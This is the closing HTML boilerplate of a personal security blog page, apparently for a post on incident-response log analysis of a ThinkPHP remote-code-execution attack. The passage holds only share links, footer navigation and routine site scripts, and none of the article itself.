  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&title=应急响应_thinkphpRCE日志分析"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&name=应急响应_thinkphpRCE日志分析&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://liangmosec.github.io/2025/04/24/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-thinkphpRCE%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/&t=应急响应_thinkphpRCE日志分析"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023-2025
    凉墨
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->


 
  <link
    rel="preload"
    href="/lib/font-awesome/css/all.min.css"
    as="style"
    onload="this.onload=null;this.rel='stylesheet'"
  />
  <noscript
    ><link
      rel="stylesheet"
      href="/lib/font-awesome/css/all.min.css"
  /></noscript>


    <!-- jquery -->

  
<script src="/lib/jquery/jquery.min.js"></script>





<!-- clipboard -->

  
    
<script src="/lib/clipboard/clipboard.min.js"></script>

  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
